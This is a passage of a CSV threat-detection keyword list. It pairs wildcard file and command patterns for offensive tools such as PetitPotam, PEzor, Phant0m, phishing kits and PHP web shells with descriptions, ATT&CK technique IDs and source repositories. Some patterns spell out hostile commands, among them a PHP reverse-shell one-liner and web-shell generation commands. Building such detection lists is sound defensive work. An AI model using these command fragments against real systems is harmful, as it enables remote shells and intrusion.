TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*PetitPotam.cpp*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*PetitPotam.exe*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*PetitPotam.exe*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*PetitPotam.ps1*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*petitpotam.py*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*petitpotam.py*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PetitPotam.py*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*PetitPotam.sln*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*PetitPotam.sln*,offensive_tool_keyword,petipotam,PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.,T1557.001 - T1021,TA0008,N/A,N/A,Network Exploitation tools,https://github.com/topotam/PetitPotam,1,1,N/A,N/A,10,1590,272,2023-07-23T17:07:07Z,2021-07-18T18:19:54Z -*PetitPotam.vcxproj*,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,1,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -*petitpotam_check*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*PetitPotamModified.exe*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,1,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -*PEzor generated Beacon Object File*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor*/Inject.c*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*Pezor*inject.hpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor.sh -*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor.sh *.bin*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor/*/bof.cpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*PEzor/*syscalls.hpp*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,1,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*pfsense*reverse_root_shell_csrf/*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*pfx2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pgfpignfckbloagkfnamnolkeaecfgfh*,greyware_tool_keyword,Free Proxy VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*pgpdisk2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pgpsda2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*pgpwde2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*Phant0m scm 1*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Phant0m scm 2*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Phant0m wmi*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,0,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*phant0m.cna*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Phant0m_cobaltstrike*,offensive_tool_keyword,cobaltstrike,Aggressor script to integrate Phant0m with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/p292/Phant0m_cobaltstrike,1,1,N/A,10,10,26,13,2017-06-08T06:42:18Z,2017-06-08T06:39:07Z -*phant0m-exe.*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*Phant0m-master.zip*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*phant0m-rdll*,offensive_tool_keyword,Phant0m,Windows Event Log Killer,T1070.004,TA0005,N/A,N/A,Defense Evasion,https://github.com/hlldz/Phant0m,1,1,N/A,N/A,10,1655,319,2023-09-21T16:08:18Z,2017-05-02T17:19:30Z -*phantom_thread * shc *,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*PhantomService.csproj*,offensive_tool_keyword,PhantomService,Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools,T1050.005 - T1055.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*PhantomService.exe*,offensive_tool_keyword,PhantomService,Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools,T1050.005 - T1055.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService,1,1,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*phish_test.go*,offensive_tool_keyword,gophish,Open-Source Phishing Toolkit,T1566-001 - T1566-002 - T1566-003 - T1056-001 - T1113 - T1567-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/gophish/gophish,1,1,N/A,10,10,9757,1875,2023-09-28T02:03:58Z,2013-11-18T23:26:43Z -*phish_windows_credentials.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Phish-Creds.ps1*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*phishery*,offensive_tool_keyword,phishery,Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.,T1566.001 - T1210 - T1565 - T1564.001,TA0002 - TA0007 - TA0010,N/A,N/A,Phishing,https://github.com/ryhanson/phishery,1,1,N/A,N/A,10,947,208,2017-09-11T15:42:10Z,2016-09-25T02:19:24Z -*phishing-HTML-linter.*,offensive_tool_keyword,phishing-HTML-linter,Phishing and Social-Engineering related scripts,T1566.001 - T1056.001,TA0040 - TA0001,N/A,N/A,Phishing,https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing,1,1,N/A,10,10,2282,458,2023-06-27T19:16:49Z,2018-02-02T21:24:03Z -*phishlets *,offensive_tool_keyword,gophish,Combination of evilginx2 and GoPhish,T1565-002 - T1565-003 - T1565-012 - T1110 - T1056-001 - T1113,TA0002 - TA0003,N/A,N/A,Credential Access - Collection,https://github.com/fin3ss3g0d/evilgophish,1,0,N/A,N/A,10,1308,237,2023-09-13T23:44:48Z,2022-09-07T02:47:43Z -*phising_attack.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*PhoenixMiner.exe*,greyware_tool_keyword,phoenix miner,Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage,T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089,TA0002 - TA0005 - TA0011 - TA0040 - TA0003,N/A,N/A,Phishing,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*PhoenixMiner_*_Windows\*,greyware_tool_keyword,phoenix miner,Phoenix Miner is a popular. efficient. fast. and cost-effective Ethereum miner with support for both AMD and Nvidia GPUs. It's intended to be used for legitimate cryptocurrency mining purposes.Attackers can secretly install Phoenix Miner on unsuspecting users' computers to mine cryptocurrency for themselves. This is often done by bundling the miner with other software or hiding it within malicious attachments or downloads. The computer then slow down due to the high CPU and GPU usage,T1059.001 - T1057 - T1027 - T1105 - T1064 - T1053.005 - T1089,TA0002 - TA0005 - TA0011 - TA0040 - TA0003,N/A,N/A,Phishing,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*phoneinfoga scan -n *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*PhoneInfoga*,offensive_tool_keyword,PhoneInfoga,An OSINT framework for phone numbers.,T1593 - T1594 - T1595 - T1567,TA0007 - TA0009 - TA0010,N/A,N/A,Information Gathering,https://github.com/sundowndev/PhoneInfoga,1,0,N/A,N/A,10,10630,3054,2023-10-02T04:05:36Z,2018-10-25T09:19:47Z -*photon.py -u * -l 3 -t 100 --wayback*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*php -f *.php -- -o myShell.php*,offensive_tool_keyword,b374k,This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. All actions take place within a web browser,T1021 - T1028 - T1071 - T1105 - T1135,TA0002 - TA0003 - TA0005,N/A,N/A,Web Attacks,https://github.com/b374k/b374k,1,0,N/A,N/A,10,2248,783,2023-07-06T20:23:03Z,2014-01-09T04:43:32Z -*php -r *$sock=fsockopen(*exec(*/bin/sh -i <&3 >&3 2>&3*,greyware_tool_keyword,php,php reverse shell,T1071 - T1071.004 - T1021,TA0002 - TA0011,N/A,N/A,C2,https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md,1,0,N/A,10,9,890,121,2023-10-03T19:54:40Z,2021-08-16T17:34:25Z -*php_filter_chain_generator --chain *php system*'cmd']*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*php_passthru_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*php_popen_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*php_proc_open_reverse_tcp.py*,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,1,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -*PHP-Code-injection.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*PHP-Code-Injections-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*phpggc -l*,offensive_tool_keyword,exegol,Fully featured and community-driven 